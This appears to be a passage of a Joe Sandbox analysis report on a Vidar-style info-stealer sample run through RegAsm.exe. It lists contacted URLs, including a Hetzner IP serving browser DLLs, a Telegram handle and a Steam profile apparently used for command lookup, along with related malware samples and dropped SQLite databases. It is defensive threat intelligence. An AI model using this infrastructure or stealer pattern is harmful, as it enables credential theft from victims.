https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://mozilla.org0/	nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	false	URL Reputation: safe	unknown
https://support.mic.BF	RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://95.217.242.142/mozglue.dll;	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BGCBGCAF.1.dr	false		high
https://95.217.242.14217d99a9f0nt-Disposition:	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.dr	false		high
https://steamcommunity.com/profiles/76561199680449169/badges	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://www.ecosia.org/newtab/	BGCBGCAF.1.dr	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.c	RegAsm.exe, 00000001.00000002.2111306678.000000000121A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	GIJDAFBK.1.dr	false		high
https://95.217.242.142/msvcp140.dlly	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/about/	76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://help.steampowered.com/en/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BGCBGCAF.1.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169	76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://t.me/r1g1o	file.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	GIJDAFBK.1.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BGCBGCAF.1.dr	false		high
https://95.217.242.142/freebl3.dll7	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	false		high
https://95.217.242.142/vcruntime140.dllp	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199680449169[1].htm.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BGCBGCAF.1.dr	false		high
https://store.steampowered.com/	76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199680449169/inventory/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	BGCBGCAF.1.dr	false		high
https://95.217.242.142/softokn3.dlli	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.210.138.105	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
95.217.242.142	unknown	Germany	24940	HETZNER-ASDE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.191.164	www.google.com	United States	15169	GOOGLEUS	false
142.250.191.196	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433685
Start date and time:	2024-04-29 22:12:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/23@5/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 95 Number of non-executed functions: 223
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.190.131, 142.251.182.84, 172.217.1.110, 34.104.35.123, 23.54.78.14, 192.229.211.108, 142.250.123.94, 142.250.190.78
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
22:13:05	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://uaqtu.com	Get hash	malicious	Unknown	Browse
	https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.com	Get hash	malicious	Unknown	Browse
	https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.com	Get hash	malicious	Unknown	Browse
	https://app.frame.io/presentations/2d6579dc-f1e9-4865-95d5-958bb921558d?component_clicked=digest_call_to_action&email_id=804d14dd-a622-4386-a24d-ac8b94986f46&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse
	https://sheyla4nish.uk/wq.PDF	Get hash	malicious	HTMLPhisher	Browse
	https://public-usa.mkt.dynamics.com/api/orgs/5c8c0184-a605-ef11-9f85-6045bd00390f/r/j0QY9SVMHE2ykWUnkq7W4wAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fisaustralia.com.au%252Fdoc%252Findex.php%253Fmail%253D%2520ryan_scott%2540office.com%2526paths%253Dabove%2526link%253DFax_Outlook%22%2C%22RedirectOptions%22%3A%7B%221%22%3Anull%7D%7D&digest=0BTPcenE%2BSe3bCywe6VBjbwnefP6rRpeXY%2FFBeN4nTE%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse
	https://berkeley-dot-yamm-track.appspot.com/Redirect?ukey=1TvyROQ89ROqfi44tqqbET_9nenqwY_rGhHnpSU0ioI8-1646603876&key=YAMMID-60639156&link=https://jrx-tele.com/14b1bb/auth/sf_rand_mixed(8)/chamilton@hilcorp.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	baddoge.exe	Get hash	malicious	Unknown	Browse
	rQLM0008233RFSOBL.exe	Get hash	malicious	AgentTesla	Browse
	http://docxservice176233065.com	Get hash	malicious	Unknown	Browse
23.210.138.105	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	https://www.steam.workshopslist.com/	Get hash	malicious	Unknown	Browse
	https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	23.210.138.105
	file.exe	Get hash	malicious	Vidar	Browse	23.210.138.105
	file.exe	Get hash	malicious	Vidar	Browse	104.105.90.131
	file.exe	Get hash	malicious	Vidar	Browse	104.108.99.20
	file.exe	Get hash	malicious	Vidar	Browse	104.108.99.20
	file.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	96.17.209.196

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	https://sheyla4nish.uk/wq.PDF	Get hash	malicious	HTMLPhisher	Browse	23.192.220.19
	EXTERNAL Compliance Training.msg	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	23.220.206.69
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:94684c90-991c-41dd-8ac6-aa0438f76723	Get hash	malicious	HTMLPhisher	Browse	23.220.246.154
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	23.210.138.105
	screenshot _2023-12_86-38-891-25983e9eee39a84a1tabb3b9.bat	Get hash	malicious	Unknown	Browse	23.220.206.37
	file.exe	Get hash	malicious	Vidar	Browse	23.210.138.105
	PXL_20240426_184121447.mp4	Get hash	malicious	Unknown	Browse	23.54.41.214
	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImhiQGJ1eXNzZW5zLWxhdy5iZSIsInJlcXVlc3RJZCI6Ijc5Mjc0MTMyLTBmNTYtNDY4Ni01NTE3LTAzODgxOWFiYTM4OCIsImxpbmsiOiJodHRwczovL2Fjcm9iYXQuYWRvYmUuY29tL2lkL3VybjphYWlkOnNjOkVVOmY0Yzk4MzIzLTdlMGUtNGUxMS1iZjA4LWMyNzhhZDc4OGEyZSIsImxhYmVsIjoiMTEiLCJsb2NhbGUiOiJkZV9ERSJ9.ugOJeKtQ8XVlkMZy3LJ7ef7OsHDizntrzEbbkchy-mLoKu0o-XppcCUdn65Zt36NHfljbtp610mpWTLrYATOQw	Get hash	malicious	HTMLPhisher	Browse	23.220.246.154
	Signature requested on jennifer.white OCF-3 Response Letter - Unsigned.msg	Get hash	malicious	HTMLPhisher	Browse	23.220.246.154
	Review_and_sign_today CFA_Agreements0001.14.pdf..msg	Get hash	malicious	HTMLPhisher	Browse	23.220.246.154
HETZNER-ASDE	SySyUs3O0a.exe	Get hash	malicious	AsyncRAT	Browse	136.243.151.123
	Inquiries_PDF.exe	Get hash	malicious	FormBook	Browse	94.130.217.179
	00000351.exe	Get hash	malicious	AgentTesla	Browse	135.181.124.14
	file.exe	Get hash	malicious	Vidar	Browse	95.217.245.42
	file.exe	Get hash	malicious	Vidar	Browse	95.217.245.42
	COMPANY PROFILE.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	116.203.164.244
	31jvjGbPV0.exe	Get hash	malicious	Unknown	Browse	176.9.63.49
	31jvjGbPV0.exe	Get hash	malicious	Unknown	Browse	176.9.63.49
	https://loowes.shop/	Get hash	malicious	Unknown	Browse	148.251.91.91
	file.exe	Get hash	malicious	Vidar	Browse	95.217.246.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://uaqtu.com	Get hash	malicious	Unknown	Browse	23.6.204.109 40.127.169.103
	https://icobath.filecloudonline.com/url/cw5uzvbvcrxmqkwt?shareto=paula.harrington@trapezegroup.com	Get hash	malicious	Unknown	Browse	23.6.204.109 40.127.169.103
	https://app.frame.io/presentations/2d6579dc-f1e9-4865-95d5-958bb921558d?component_clicked=digest_call_to_action&email_id=804d14dd-a622-4386-a24d-ac8b94986f46&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	23.6.204.109 40.127.169.103
	https://berkeley-dot-yamm-track.appspot.com/Redirect?ukey=1TvyROQ89ROqfi44tqqbET_9nenqwY_rGhHnpSU0ioI8-1646603876&key=YAMMID-60639156&link=https://jrx-tele.com/14b1bb/auth/sf_rand_mixed(8)/chamilton@hilcorp.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	23.6.204.109 40.127.169.103
	rQLM0008233RFSOBL.exe	Get hash	malicious	AgentTesla	Browse	23.6.204.109 40.127.169.103
	http://docxservice176233065.com	Get hash	malicious	Unknown	Browse	23.6.204.109 40.127.169.103
	https://bit.ly/3wbA39Y	Get hash	malicious	HTMLPhisher	Browse	23.6.204.109 40.127.169.103
	https://m.exactag.com/ai.aspx?tc=d9496601bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ablessedbeyondproperties.com%2Fwinner%2F71809%2F%2Fam9lbC5zZWFybGVAemJldGEuY29t	Get hash	malicious	HTMLPhisher	Browse	23.6.204.109 40.127.169.103
	https://cloudflare-ipfs.com/ipfs/bafybeidbwe5v5asgmddcnlzq4f3ovo4xudb4di22gi7io52tiaro7dsjka#	Get hash	malicious	HTMLPhisher	Browse	23.6.204.109 40.127.169.103
	0okjnm1gOR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	23.6.204.109 40.127.169.103
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	95.217.242.142
	SecuriteInfo.com.Win32.DropperX-gen.990.17898.exe	Get hash	malicious	CobaltStrike	Browse	95.217.242.142
	SecuriteInfo.com.Win32.DropperX-gen.990.17898.exe	Get hash	malicious	CobaltStrike	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
	sdfYc98GO4.exe	Get hash	malicious	CobaltStrike	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
	file.exe	Get hash	malicious	Vidar	Browse	95.217.242.142
37f463bf4616ecd445d4a1937da06e19	z39103_PN-EN-1090-1_A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.210.138.105
	rCW_00402902400429.bat	Get hash	malicious	FormBook, GuLoader	Browse	23.210.138.105
	z6FORMATOPROVEEDORESMETAX.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.210.138.105
	z77EU17439-FT-MILKYLUXGOUDAMILD.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.210.138.105
	beta.dll.dll	Get hash	malicious	Latrodectus	Browse	23.210.138.105
	Document_g55_79a057639-91h49176a6220-1759n0.js	Get hash	malicious	Latrodectus	Browse	23.210.138.105
	bim.msi	Get hash	malicious	Latrodectus	Browse	23.210.138.105
	SWIFT Copy000224042024-pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	23.210.138.105
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse	23.210.138.105
	sample.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.210.138.105

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	A4eSWqbQPf.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse
	N3MZMKV5GN.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	nJGNa9kHJf.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	7PFj8ZyNTr.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HpsVE4Pwxn.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	u7p2rff5aP.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	w9SuIZ5zTo.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	crU0kgeotC.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	A4eSWqbQPf.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse
	N3MZMKV5GN.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	nJGNa9kHJf.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	7PFj8ZyNTr.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HpsVE4Pwxn.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	u7p2rff5aP.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	w9SuIZ5zTo.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	crU0kgeotC.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BGCBGCAF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGHJJDGHCBGDHIECBGID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
